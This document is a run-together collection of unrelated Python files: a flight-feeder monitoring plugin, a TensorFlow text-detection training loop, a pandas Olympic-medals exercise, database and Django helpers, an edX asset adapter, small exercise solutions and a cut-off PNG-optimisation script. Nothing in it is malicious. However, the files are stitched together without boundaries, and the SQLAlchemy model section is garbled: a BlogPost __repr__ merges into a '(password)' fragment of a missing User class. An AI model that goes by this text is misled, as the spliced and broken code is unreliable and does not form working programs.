service was not # running or it was above some "critical" threshold. # STATE_UNKNOWN = 3: Invalid command line arguments were supplied to the # plugin or low-level failures internal to the plugin (such as unable to # fork, or open a tcp socket) that prevent it from performing the # specified operation. Higher-level errors (such as name resolution # errors, socket timeouts, etc) are outside of the control of plugins and # should generally NOT be reported as UNKNOWN states. # Author of state definition # __author__ = 'Linuxfabrik GmbH, Zurich/Switzerland' # __version__ = '2020043001' STATE_OK = 0 STATE_WARN = 1 STATE_CRIT = 2 STATE_UNKNOWN = 3 #STATE_DEPENDENT = 4 ########### common functions ########### # useful functions - Copyright by https://git.linuxfabrik.ch/linuxfabrik/lib/-/blob/master/base3.py def get_perfdata(label, value, uom, warn, crit, min, max): """Returns 'label'=value[UOM];[warn];[crit];[min];[max] """ msg = "'{}'={}".format(label, value) if uom is not None: msg += uom msg += ';' if warn is not None: msg += str(warn) msg += ';' if crit is not None: msg += str(crit) msg += ';' if min is not None: msg += str(min) msg += ';' if max is not None: msg += str(max) msg += ' ' return msg def oao(msg, state=STATE_OK, perfdata='', always_ok=False): """Over and Out (OaO) Print the stripped plugin message. If perfdata is given, attach it by `|` and print it stripped. Exit with `state`, or with STATE_OK (0) if `always_ok` is set to `True`. """ if perfdata: print(msg.strip() + '|' + perfdata.strip()) else: print(msg.strip()) if always_ok: sys.exit(0) sys.exit(state) def coe(result, state=STATE_UNKNOWN): """Continue or Exit (CoE) This is useful if calling complex library functions in your checks `main()` function. Don't use this in functions. If a more complex library function, for example `lib.url3.fetch()` fails, it returns `(False, 'the reason why I failed')`, otherwise `(True, 'this is my result'). This forces you to do some error handling. To keep things simple, use `result = lib.base3.coe(lib.url.fetch(...))`. If `fetch()` fails, your plugin will exit with STATE_UNKNOWN (default) and print the original error message. Otherwise your script just goes on. The use case in `main()` - without `coe`: >>> success, html = lib.url3.fetch(URL) >>> if not success: >>> print(html) # contains the error message here >>>> exit(STATE_UNKNOWN) Or simply: >>> html = lib.base3.coe(lib.url.fetch(URL)) Parameters ---------- result : tuple The result from a function call. result[0] = expects the function return code (True on success) result[1] = expects the function result (could be of any type) state : int If result[0] is False, exit with this state. Default: 3 (which is STATE_UNKNOWN) Returns ------- any type The result of the inner function call (result[1]). """ if result[0]: # success return result[1] print(result[1]) sys.exit(state) ########### specific check functions ########### def parse_args(): """Parse command line arguments using argparse. """ parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument( '-V', '--version', action='version', version='%(prog)s: v{} by {}'.format(__version__, __author__) ) parser.add_argument( '--always-ok', help='Always returns OK.', dest='ALWAYS_OK', action='store_true', default=False, ) parser.add_argument( '--host', help='Host IP address of your feeder.', dest='HOST_IP', required=True, default=False, ) parser.add_argument( '--port', help='Monitor Port of your feeder. Default: %(default)s', dest='HOST_PORT', default=DEFAULT_PORT, ) parser.add_argument( '-c', '--critical', help='Set the critical threshold seconds since last connection update. Default: %(default)s', dest='CRIT', type=int, default=DEFAULT_CRIT, ) parser.add_argument( '-w', '--warning', help='Set the warning threshold seconds since last connection update. Default: %(default)s', dest='WARN', type=int, default=DEFAULT_WARN, ) return parser.parse_args() def run_monitor_check(path): """Check FR24 feeder. """ headers = CaseInsensitiveDict() headers["Accept"] = "application/json" # Get data from monitor.json try: j = requests.get(path, headers=headers) json_str = j.json() except Exception as ex: template = "An exception of type {0} occurred. Arguments:\n{1!r}" msg = template.format(type(ex).__name__, ex.args) return(False, msg) # FAKE request # f = open("sample_data/monitor.json") # json_str = json.load(f) try: return (True, json_str) except: return(False, 'ValueError: No JSON object could be decoded') def get_sec_last_status(data): """Read out seconds since last status update. """ # Get current datetime now = datetime.datetime.utcnow() # Check date difference try: ### timeFormat: 2022-03-17 12:39:31 datetimeunix = int(data['feed_last_ac_sent_time']) # lastsentTime = datetime.datetime.strptime(datetimestring, '%Y-%m-%d %H:%M:%S') lastsentTime = datetime.datetime.utcfromtimestamp(datetimeunix) # calculate time difference diffInSecs = (abs(now - lastsentTime ).days * 24 * 60 * 60) + abs(now - lastsentTime ).seconds return (True, diffInSecs) except: return (False, 'ValueError: Last Status could not be parsed') def get_metrics(data): try: metrics = { 'adsb_tracked': data['feed_num_ac_adsb_tracked'], 'non_adsb_tracked': data['feed_num_ac_non_adsb_tracked'], 'sum_tracked': data['feed_num_ac_tracked'] } return (True, metrics) except: return (False, 'ValueError: Metrics could not be parsed') def get_status(data): try: status = { 'feed_status': data['feed_status'] , 'last_rx_connect_status': data['last_rx_connect_status'], 'feed_last_connected_time': datetime.datetime.utcfromtimestamp(int(data['feed_last_connected_time'])).strftime("%Y-%m-%d %H:%M:%S") } return (True, status) except: return (False, 'ValueError: Status could not be parsed') def main(): """The main function. Hier spielt die Musik. """ # parse the command line, exit with UNKNOWN if it fails try: args = parse_args() except SystemExit: sys.exit(STATE_UNKNOWN) # init output vars msg = '' state = STATE_OK perfdata = '' # Build url path = 'http://' + args.HOST_IP + ':' + args.HOST_PORT + '/monitor.json' response = coe(run_monitor_check(path)) diffSecs = coe(get_sec_last_status(response)) metrics = coe(get_metrics(response)) status = coe(get_status(response)) # # Add metrics to perfdata perfdata += get_perfdata('adsb_tracked', metrics['adsb_tracked'], None, None, None, 0, None) perfdata += get_perfdata('non_adsb_tracked', metrics['non_adsb_tracked'], None, None, None, 0, None) perfdata += get_perfdata('sum_tracked', metrics['sum_tracked'], None, None, None, 0, None) # check warn and crit thresholds try: if diffSecs > args.CRIT: msg += 'CRIT threshold reached: ' + str(diffSecs) state = STATE_CRIT else: if diffSecs > args.WARN: msg += 'WARN threshold reached: ' + str(diffSecs) state = STATE_WARN else: msg = 'Feeder: OK - ' + str(diffSecs) + 's since last upload' msg += '\nStatus: {}'.format(status['feed_status'] + ' since ' + status['feed_last_connected_time'] ) state = STATE_OK except Exception as ex: template = "An exception of type {0} occurred. Arguments:\n{1!r}" msg = template.format(type(ex).__name__, ex.args) state = STATE_UNKNOWN oao(msg, state, perfdata) if __name__ == '__main__': try: main() except Exception: # pylint: disable=W0703 """See you (cu) Prints a Stacktrace (replacing "<" and ">" to be printable in Web-GUIs), and exits with STATE_UNKNOWN. """ print(format_exc().replace("<", "'").replace(">", "'")) sys.exit(STATE_UNKNOWN) # Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ # Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import numpy as np import tensorflow as tf import random from tensorflow.contrib import slim tf.app.flags.DEFINE_integer('input_size', 512, '') tf.app.flags.DEFINE_integer('batch_size_per_gpu', 14, '') tf.app.flags.DEFINE_integer('num_readers', 16, '') tf.app.flags.DEFINE_float('learning_rate', 0.0001, '') tf.app.flags.DEFINE_integer('max_steps', 100000, '') tf.app.flags.DEFINE_float('moving_average_decay', 0.997, '') tf.app.flags.DEFINE_string('gpu_list', '0', '') tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/east_resnet_v1_50_rbox/', '') tf.app.flags.DEFINE_boolean('restore', False, 'whether to resotre from checkpoint') tf.app.flags.DEFINE_integer('save_checkpoint_steps', 1000, '') tf.app.flags.DEFINE_integer('save_summary_steps', 100, '') tf.app.flags.DEFINE_string('pretrained_model_path', None, '') tf.app.flags.DEFINE_boolean('use_processed_data', False, 'whether to use processed data') tf.app.flags.DEFINE_string('processed_data', './processed_dataset/', 'where to save preprocessed datasets') import model import icdar FLAGS = tf.app.flags.FLAGS gpus = list(range(len(FLAGS.gpu_list.split(',')))) def tower_loss(images, score_maps, geo_maps, training_masks, reuse_variables=None): # Build inference graph with tf.variable_scope(tf.get_variable_scope(), reuse=reuse_variables): f_score, f_geometry = model.model(images, is_training=True) model_loss = model.loss(score_maps, f_score, geo_maps, f_geometry, training_masks) total_loss = tf.add_n([model_loss] + tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) # add summary if reuse_variables is None: tf.summary.image('input', images) tf.summary.image('score_map', score_maps) tf.summary.image('score_map_pred', f_score * 255) tf.summary.image('geo_map_0', geo_maps[:, :, :, 0:1]) tf.summary.image('geo_map_0_pred', f_geometry[:, :, :, 0:1]) tf.summary.image('training_masks', training_masks) tf.summary.scalar('model_loss', model_loss) tf.summary.scalar('total_loss', total_loss) return total_loss, model_loss def average_gradients(tower_grads): average_grads = [] for grad_and_vars in zip(*tower_grads): grads = [] for g, _ in grad_and_vars: expanded_g = tf.expand_dims(g, 0) grads.append(expanded_g) grad = tf.concat(grads, 0) grad = tf.reduce_mean(grad, 0) v = grad_and_vars[0][1] grad_and_var = (grad, v) average_grads.append(grad_and_var) return average_grads def main(argv=None): import os os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu_list if not tf.gfile.Exists(FLAGS.checkpoint_path): tf.gfile.MkDir(FLAGS.checkpoint_path) else: if not FLAGS.restore: tf.gfile.DeleteRecursively(FLAGS.checkpoint_path) tf.gfile.MkDir(FLAGS.checkpoint_path) input_images = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='input_images') input_score_maps = tf.placeholder(tf.float32, shape=[None, None, None, 1], name='input_score_maps') if FLAGS.geometry == 'RBOX': input_geo_maps = tf.placeholder(tf.float32, shape=[None, None, None, 5], name='input_geo_maps') else: input_geo_maps = tf.placeholder(tf.float32, shape=[None, None, None, 8], name='input_geo_maps') input_training_masks = tf.placeholder(tf.float32, shape=[None, None, None, 1], name='input_training_masks') global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False) learning_rate = tf.train.exponential_decay(FLAGS.learning_rate, global_step, decay_steps=10000, decay_rate=0.94, staircase=True) # add summary tf.summary.scalar('learning_rate', learning_rate) opt = tf.train.AdamOptimizer(learning_rate) # opt = tf.train.MomentumOptimizer(learning_rate, 0.9) # split input_images_split = tf.split(input_images, len(gpus)) input_score_maps_split = tf.split(input_score_maps, len(gpus)) input_geo_maps_split = tf.split(input_geo_maps, len(gpus)) input_training_masks_split = tf.split(input_training_masks, len(gpus)) tower_grads = [] reuse_variables = None for i, gpu_id in enumerate(gpus): with tf.device('/gpu:%d' % gpu_id): with tf.name_scope('model_%d' % gpu_id) as scope: iis = input_images_split[i] isms = input_score_maps_split[i] igms = input_geo_maps_split[i] itms = input_training_masks_split[i] total_loss, model_loss = tower_loss(iis, isms, igms, itms, reuse_variables) batch_norm_updates_op = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope)) reuse_variables = True grads = opt.compute_gradients(total_loss) tower_grads.append(grads) grads = average_gradients(tower_grads) apply_gradient_op = opt.apply_gradients(grads, global_step=global_step) summary_op = tf.summary.merge_all() # save moving average variable_averages = tf.train.ExponentialMovingAverage( FLAGS.moving_average_decay, global_step) variables_averages_op = variable_averages.apply(tf.trainable_variables()) # batch norm updates with tf.control_dependencies([variables_averages_op, apply_gradient_op, batch_norm_updates_op]): train_op = tf.no_op(name='train_op') saver = tf.train.Saver(tf.global_variables()) summary_writer = tf.summary.FileWriter(FLAGS.checkpoint_path, tf.get_default_graph()) init = tf.global_variables_initializer() if FLAGS.pretrained_model_path is not None: variable_restore_op = slim.assign_from_checkpoint_fn(FLAGS.pretrained_model_path, slim.get_trainable_variables(), ignore_missing_vars=True) with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess: if FLAGS.restore: print('continue training from previous checkpoint') ckpt = tf.train.latest_checkpoint(FLAGS.checkpoint_path) saver.restore(sess, ckpt) else: sess.run(init) if FLAGS.pretrained_model_path is not None: variable_restore_op(sess) data_generator = icdar.get_batch(num_workers=FLAGS.num_readers, input_size=FLAGS.input_size, batch_size=FLAGS.batch_size_per_gpu * len(gpus)) start = time.time() for step in range(FLAGS.max_steps): if FLAGS.use_processed_data: index = random.randint(0, 1000 - 1) images = np.fromfile(os.path.join(FLAGS.processed_data, 'input_images_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, FLAGS.input_size, FLAGS.input_size, 3) score_maps = np.fromfile(os.path.join(FLAGS.processed_data, 'input_score_maps_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 1) geo_maps = np.fromfile(os.path.join(FLAGS.processed_data, 'input_geo_maps_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 5) training_masks = np.fromfile( os.path.join(FLAGS.processed_data, 'input_training_masks_{}.bin'.format(index)), dtype='float32').reshape(FLAGS.batch_size_per_gpu, 128, 128, 1) else: data = next(data_generator) images = data[0] score_maps = data[2] geo_maps = data[3] training_masks = data[4] ml, tl, _ = sess.run([model_loss, total_loss, train_op], feed_dict={input_images: images, input_score_maps: score_maps, input_geo_maps: geo_maps, input_training_masks: training_masks}) if np.isnan(tl): print('Loss diverged, stop training') break if step % 10 == 0: avg_time_per_step = (time.time() - start)/10 avg_examples_per_second = (10 * FLAGS.batch_size_per_gpu * len(gpus))/(time.time() - start) start = time.time() print('Step {:06d}, model loss {:.4f}, total loss {:.4f}, {:.2f} seconds/step, {:.2f} examples/second'.format( step, ml, tl, avg_time_per_step, avg_examples_per_second)) if step % FLAGS.save_checkpoint_steps == 0: saver.save(sess, FLAGS.checkpoint_path + 'model.ckpt', global_step=global_step) if step % FLAGS.save_summary_steps == 0: _, tl, summary_str = sess.run([train_op, total_loss, summary_op], feed_dict={input_images: images, input_score_maps: score_maps, input_geo_maps: geo_maps, input_training_masks: training_masks}) summary_writer.add_summary(summary_str, global_step=step) if __name__ == '__main__': tf.app.run() # -------------- #Importing header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #Path of the file is stored in the variable path #Code starts here # STEP 1: Data Loading data=pd.read_csv(path) data.rename(columns = {'Total':'Total_Medals'}, inplace = True) # data.head(10) # STEP 2: Summer or Winter # Creating new column 'Better_Event data['Better_Event']=np.where(data['Total_Summer']>data['Total_Winter'],'Summer','Winter') data['Better_Event']=np.where(data['Total_Summer']==data['Total_Winter'],'Both',data['Better_Event']) # Finding the value with max count in 'Better_Event' column better_event=data['Better_Event'].value_counts().index.values[0] # #Printing the better event # print('Better_Event=', better_event) # STEP 3: Top 10 #Subsetting the dataframe top_countries= data[['Country_Name','Total_Summer', 'Total_Winter','Total_Medals']] #Dropping the last row top_countries=top_countries[:-1] #Function for top 10 def top_ten(data,col): # Creating new empty list country_list=[] #Finding the top 10 values of 'col' column country_list=list((data.nlargest(10,col)['Country_Name'])) #Returning the top 10 list return country_list #Calling the function for Top 10 in Summer top_10_summer=top_ten(top_countries,'Total_Summer') #Calling the function for Top 10 in Winter top_10_winter=top_ten(top_countries,'Total_Winter') #Calling the function for Top 10 in both the events top_10=top_ten(top_countries,'Total_Medals') print("Top 10:\n",top_10, "\n") #Extracting common country names from all three lists common=list(set(top_10_summer) & set(top_10_winter) & set(top_10)) print('Common Countries :\n',common, "\n") # STEP 4: Plotting top 10 # For Summer #Creating the dataframe for Summer event summer_df= data[data['Country_Name'].isin(top_10_summer)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(summer_df['Country_Name'], summer_df['Total_Summer']) #Changing the graph title plt.title('Top 10 Summer') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() # For Winter #Creating the dataframe for Winter event winter_df= data[data['Country_Name'].isin(top_10_winter)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(winter_df['Country_Name'], winter_df['Total_Winter']) #Changing the graph title plt.title('Top 10 Winter') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() #For both the events #Creating the dataframe for both the events top_df=data[data['Country_Name'].isin(top_10)] #Plotting the bar graph plt.figure(figsize=(20, 6)) plt.bar(top_df['Country_Name'], top_df['Total_Medals']) #Changing the graph title plt.title('Top 10') #Changing the x-axis label plt.xlabel('Country Name') #Changing the y-axis label plt.ylabel('Total Medals') plt.show() # STEP 5: Top Performing Countries # FOR SUMMMER LIST #Creating new column 'Golden_Ratio' summer_df['Golden_Ratio']=summer_df['Gold_Summer']/summer_df['Total_Summer'] #Finding the max value of 'Golden_Ratio' column summer_max_ratio=max(summer_df['Golden_Ratio']) #Finding the country associated with the max value of 'Golden_Ratio' column summer_country_gold=summer_df.loc[summer_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Summer Country:", summer_country_gold, " with a ratio of %.2f" %summer_max_ratio ) #For Winter List #Creating new column 'Golden_Ratio' winter_df['Golden_Ratio']=winter_df['Gold_Winter']/winter_df['Total_Winter'] #Finding the max value of 'Golden_Ratio' column winter_max_ratio=max(winter_df['Golden_Ratio']) #Finding the country assosciated with the max value of 'Golden_Ratio' column winter_country_gold=winter_df.loc[winter_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Winter Country:", winter_country_gold, " with a ratio of %.2f" %winter_max_ratio ) #For Overall List #Creating new column 'Golden_Ratio' top_df['Golden_Ratio']=top_df['Gold_Total']/top_df['Total_Medals'] #Finding the max value of 'Golden_Ratio' column top_max_ratio=max(top_df['Golden_Ratio']) #Finding the country assosciated with the max value of 'Golden_Ratio' column top_country_gold=top_df.loc[top_df['Golden_Ratio'].idxmax(),'Country_Name'] print("Top Country:", top_country_gold, " with a ratio of %.2f" %top_max_ratio ) # STEP 6 : Best in the world #Removing the last row of the data data_1=data[:-1] #Creating a new column 'Total_Points' data_1['Total_Points']= data_1['Gold_Total']*3 + data_1['Silver_Total']*2 + data_1['Bronze_Total']*1 # Use of position index to handle the ambiguity of having same name columns #Finding the maximum value of 'Total_Points' column most_points=max(data_1['Total_Points']) #Finding the country assosciated with the max value of 'Total_Column' column best_country=data_1.loc[data_1['Total_Points'].idxmax(),'Country_Name'] print('The maximum points achieved is ', most_points, ' by ', best_country ) # STEP 7: Plotting the best #Subsetting the dataframe best=data[data['Country_Name']==best_country] best.reset_index(drop=True,inplace=True) best=best[['Gold_Total','Silver_Total','Bronze_Total']] best.plot.bar(stacked=True) #Changing the x-axis label plt.xlabel('United States') #Changing the y-axis label plt.ylabel('medals Tally') #Rotating the ticks of X-axis plt.xticks(rotation=45) plt.show() 1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- import time import logging import zlib import ujson as json from copy import copy from telephus.cassandra.c08.ttypes import NotFoundException from twisted.internet.defer import inlineCallbacks, returnValue from hiispider.components import * from hiispider.metacomponents import * import logging from hiiguid import HiiGUID from zlib import decompress from difflib import SequenceMatcher import binascii from pprint import pformat from .base import MetaComponent LOGGER = logging.getLogger(__name__) class DeltaTesting(MetaComponent): allow_clients = False requires = [Cassandra] def __init__(self, server, config, server_mode, **kwargs): super(DeltaTesting, self).__init__(server, server_mode) self.config = copy(config) self.service_mapping = config["service_mapping"] self.server.expose(self.regenerate_by_uuid) @inlineCallbacks def regenerate_by_uuid(self, uuid): delta = yield self.server.cassandra.get_delta(uuid) function_name = self.service_mapping.get( delta["subservice"], delta["subservice"]) delta_func = self.server.functions[function_name]["delta"] if not delta_func: raise Exception("Delta function %s " "does not exist." % delta["service"]) deltas = delta_func(delta["new_data"], delta["old_data"]) if not deltas: raise Exception("No deltas were generated.") # Find nearest delta. delta_options = [] s = SequenceMatcher() s.set_seq1(json.dumps(delta["data"])) for delta in deltas: LOGGER.debug(pformat(delta.data)) value = json.dumps(delta.data) s.set_seq2(value) delta_options.append((s.ratio(), value, delta.data)) # Sort to find the most similar option. delta_options = sorted(delta_options, key=lambda x: x[0]) replacement_data = zlib.compress(json.dumps(delta_options[-1][2])) ts = str(time.time()) mapping = {"updated": ts, "data": replacement_data} yield self.server.cassandra.batch_insert( key=binascii.unhexlify(uuid), column_family=self.server.cassandra.cf_delta, mapping=mapping, consistency=2) LOGGER.debug("%s deltas generated." % len(deltas)) returnValue(True) blockchainhelppro/dataanalysis-Crypto import xml.etree.cElementTree as ET import pprint from collections import defaultdict import re ''' The code below allows you to check the k value for each tag. By classifying the tagss into few categories: 1. "lower": valid tags containing only lowercase letters 2. "lower_colon": valid tags with a colon in the names 3. "problemchars": tags with problematic characters 4. "other": other tags that don't fall into the 3 categories above ''' lower = re.compile(r'^([a-z]|_)*$') lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$') problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]') def key_type(element, keys): if element.tag == "tag": k = element.attrib['k'] if re.search(lower,k): keys["lower"] += 1 elif re.search(lower_colon,k): keys["lower_colon"] += 1 elif re.search(problemchars,k): keys["problemchars"] += 1 else: keys["other"] += 1 return keys def process_map(filename): keys = {"lower": 0, "lower_colon": 0, "problemchars": 0, "other": 0} for _, element in ET.iterparse(filename): keys = key_type(element, keys) return keys def test(): keys = process_map('san-jose_california.osm') pprint.pprint(keys) if __name__ == "__main__": test()#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Sun Dec 9 12:33:12 2018 @author: vadim """ import numpy as np def func(point): x, y = point #return (1-x) ** 2 + 100 * (y - x ** 2) ** 2 # Rosenbrog #return (x ** 2 + y - 11) ** 2 + (x + y ** 2 - 7) ** 2 # Himmelblau nagasudhirpulla/guj_sced_inp_load import datetime as dt from typing import List, Tuple import psycopg2 from src.typeDefs.smpRow import ISmpRow class SmpRepo(): def __init__(self, dbHost: str, dbname: str, uname: str, dbPass: str) -> None: self.dbHost = dbHost self.dbname = dbname self.uname = uname self.dbPass = dbPass def insertSmp(self, smpRows: List[ISmpRow]) -> bool: dbConn = None isInsertSuccess = True try: # get the connection object dbConn = psycopg2.connect(host=self.dbHost, dbname=self.dbname, user=self.uname, password=self.dbPass) # get cursor for raw data table dbCur = dbConn.cursor() # create sql for insertion dataInsertionTuples: List[Tuple] = [(x["regTag"], dt.datetime.strftime(x["dataTime"], "%Y-%m-%d %H:%M:%S"), x["smpVal"], x["rev"]) for x in smpRows] dataText = ','.join(dbCur.mogrify('(%s,%s,%s,%s)', row).decode( "utf-8") for row in dataInsertionTuples) sqlTxt = 'INSERT INTO public.smp_data(\ region_tag, data_time, smp_val, rev)\ VALUES {0} on conflict (region_tag, data_time, rev) \ do update set smp_val = excluded.smp_val'.format(dataText) # execute the sql to perform insertion dbCur.execute(sqlTxt) # commit the changes dbConn.commit() except Exception as e: isInsertSuccess = False print('Error while bulk insertion of SMP values into db') print(e) finally: # closing database connection and cursor if(dbConn): # close the cursor object to avoid memory leaks dbCur.close() # close the connection object also dbConn.close() return isInsertSuccess def getSmp(self, regTag: str, revisionNum: int, startTime: dt.datetime, endTime: dt.datetime) -> List[ISmpRow]: smpObjs: List[ISmpRow] = [] try: # get the connection object conn = psycopg2.connect(host=self.dbHost, dbname=self.dbname, user=self.uname, password=self.dbPass) # get the cursor from connection cur = conn.cursor() # create the query postgreSQL_select_Query = "select data_time, smp_val from public.smp_data where region_tag=%s and rev=%s and (data_time between %s and %s) order by data_time" # execute the query cur.execute(postgreSQL_select_Query, (regTag, revisionNum, startTime, endTime)) # fetch all the records from cursor records = cur.fetchall() # iterate through all the fetched records for rowIter in range(len(records)): dbRow = records[rowIter] smpObj: ISmpRow = { "dataTime": dbRow[0], "smpVal": dbRow[1], "regTag": regTag, "rev": revisionNum } smpObjs.append(smpObj) except (Exception, psycopg2.Error) as error: print("Error while fetching data from PostgreSQL", error) smpObjs = [] finally: # closing database connection and cursor if(conn): # close the cursor object to avoid memory leaks cur.close() # close the connection object also conn.close() return smpObjs 0 # HOW TO # https://docs.djangoproject.com/en/1.10/howto/custom-management-commands/ # python manage.py cmd_subjects_optimize import sys from django.core.management.base import BaseCommand from dbpedialinks.models import * from myutils.myutils import * class Command(BaseCommand): help = 'command to calc tot counts for tags / so to make tagcloud faster' def handle(self, *args, **options): # change True/False as needed.. if False: # 1: cache the total count tot = DBPediaEntity.objects.count() counter = 0 for x in DBPediaEntity.objects.all(): counter += 1 x.update_tot_count() print("{}/{} - {}".format(counter, tot, x.title)) print("Done - objects created!") if True: tot = DBPediaEntity.objects.count() counter = 0 for x in DBPediaEntity.objects.all(): counter += 1 print("{}/{} - {}".format(counter, tot, x.title)) x.related_subjects(size=10, CACHE=True) print("Done - objects created!") def max_ones(arr): max = 0 count = 0 for i in arr: if i == 1: count += 1 if count > max: max = count if i == 0: count = 0 return max osoco/better-ways-of-thinking-about-softwarePart-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/olx_rest_api/adapters.py """ Helpers required to adapt to differing APIs """ from contextlib import contextmanager import logging import re from opaque_keys import InvalidKeyError from opaque_keys.edx.keys import AssetKey, CourseKey from fs.memoryfs import MemoryFS from fs.wrapfs import WrapFS from common.djangoapps.static_replace import replace_static_urls from xmodule.contentstore.content import StaticContent from xmodule.assetstore.assetmgr import AssetManager from xmodule.modulestore.django import modulestore as store from xmodule.modulestore.exceptions import ItemNotFoundError from xmodule.exceptions import NotFoundError from xmodule.xml_module import XmlParserMixin log = logging.getLogger(__name__) def get_block(usage_key): """ Return an XBlock from modulestore. """ return store().get_item(usage_key) def get_asset_content_from_path(course_key, asset_path): """ Locate the given asset content, load it into memory, and return it. Returns None if the asset is not found. """ try: asset_key = StaticContent.get_asset_key_from_path(course_key, asset_path) return AssetManager.find(asset_key) except (ItemNotFoundError, NotFoundError): return None def rewrite_absolute_static_urls(text, course_id): """ Convert absolute URLs like https://studio-site.opencraft.hosting/asset-v1:LabXchange+101+2019+type@asset+block@SCI_1.2_Image_.png to the proper /static/SCI_1.2_Image_.png format for consistency and portability. """ assert isinstance(course_id, CourseKey) asset_full_url_re = r'https?://[^/]+/(?P[^\s\'"&]+)' def check_asset_key(match_obj): """ If this URL's path part is an AssetKey from the same course, rewrite it. """ try: asset_key = AssetKey.from_string(match_obj.group('maybe_asset_key')) except InvalidKeyError: return match_obj.group(0) # Not an asset key; do not rewrite if asset_key.course_key == course_id: return '/static/' + asset_key.path # Rewrite this to portable form else: return match_obj.group(0) # From a different course; do not rewrite return re.sub(asset_full_url_re, check_asset_key, text) def collect_assets_from_text(text, course_id, include_content=False): """ Yield dicts of asset content and path from static asset paths found in the given text. Make sure to have replaced the URLs with rewrite_absolute_static_urls first. If include_content is True, the result will include a contentstore StaticContent file object which wraps the actual binary content of the file. """ # Replace static urls like '/static/foo.png' static_paths = [] # Drag-and-drop-v2 has # "/static/blah.png" # which must be changed to "/static/blah.png" for replace_static_urls to work: text2 = text.replace(""", '"') replace_static_urls(text=text2, course_id=course_id, static_paths_out=static_paths) for (path, uri) in static_paths: if path.startswith('/static/'): path = path[8:] info = { 'path': path, 'url': '/' + str(StaticContent.compute_location(course_id, path)), } if include_content: content = get_asset_content_from_path(course_id, path) if content is None: log.error("Static asset not found: (%s, %s)", path, uri) else: info['content'] = content yield info @contextmanager def override_export_fs(block): """ Hack required for some legacy XBlocks which inherit XModuleDescriptor.add_xml_to_node() instead of the usual XmlSerializationMixin.add_xml_to_node() method. This method temporarily replaces a block's runtime's 'export_fs' system with an in-memory filesystem. This method also abuses the XmlParserMixin.export_to_file() API to prevent the XModule export code from exporting each block as two files (one .olx pointing to one .xml file). The export_to_file was meant to be used only by the customtag XModule but it makes our lives here much easier. """ fs = WrapFS(MemoryFS()) fs.makedir('course') fs.makedir('course/static') # Video XBlock requires this directory to exists, to put srt files etc. old_export_fs = block.runtime.export_fs block.runtime.export_fs = fs if hasattr(block, 'export_to_file'): old_export_to_file = block.export_to_file block.export_to_file = lambda: False old_global_export_to_file = XmlParserMixin.export_to_file XmlParserMixin.export_to_file = lambda _: False # So this applies to child blocks that get loaded during export yield fs block.runtime.export_fs = old_export_fs if hasattr(block, 'export_to_file'): block.export_to_file = old_export_to_file XmlParserMixin.export_to_file = old_global_export_to_file ghaith96/exercism-python def response(hey_bob: str): hey_bob = hey_bob.strip() if hey_bob.isupper() and hey_bob.endswith("?"): return "Calm down, I know what I'm doing!" if hey_bob.endswith("?"): return "Sure." if hey_bob.isupper(): return "Whoa, chill out!" if hey_bob.isspace() or len(hey_bob) == 0: return "Fine. Be that way!" return "Whatever." 0 from project import db from project import bcrypt from sqlalchemy import ForeignKey from sqlalchemy.orm import relationship class BlogPost(db.Model): __tablename__ = "posts" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String, nullable=False) description = db.Column(db.String, nullable=False) author_id = db.Column(db.Integer, ForeignKey('users.id')) def __init__(self, title, description, author_id): self.title = title self.description = description self.author_id = author_id def __repr__(self): return '(password) def is_authenticated(self): return True def is_active(self): return True def is_anonymous(self): return False def get_id(self): return unicode(self.id) def __repr__(self): return '<name - {}>'.format(self.name) #!/usr/bin/env python # Copyright (c) 2014-2016 The Harzcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. ''' Run this script every time you change one of the png files. Using pngcrush, it will optimize the png files, remove various color profiles, remove ancillary chunks (alla) and text chunks (text). #pngcrush -brute -ow -rem gAMA -rem cHRM -rem iCCP -rem sRGB -rem alla -rem text ''' import os import sys import subprocess import hashlib from PIL import Image def file_hash(filename): '''Return hash of raw file contents''' with open(filename, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() def content_hash(filename): '''Return hash of RGBA contents of image''' i = Image.open(filename) i = i.convert('RGBA') data = i.tobytes() return hashlib.sha256(data).hexdigest() pngcrush = 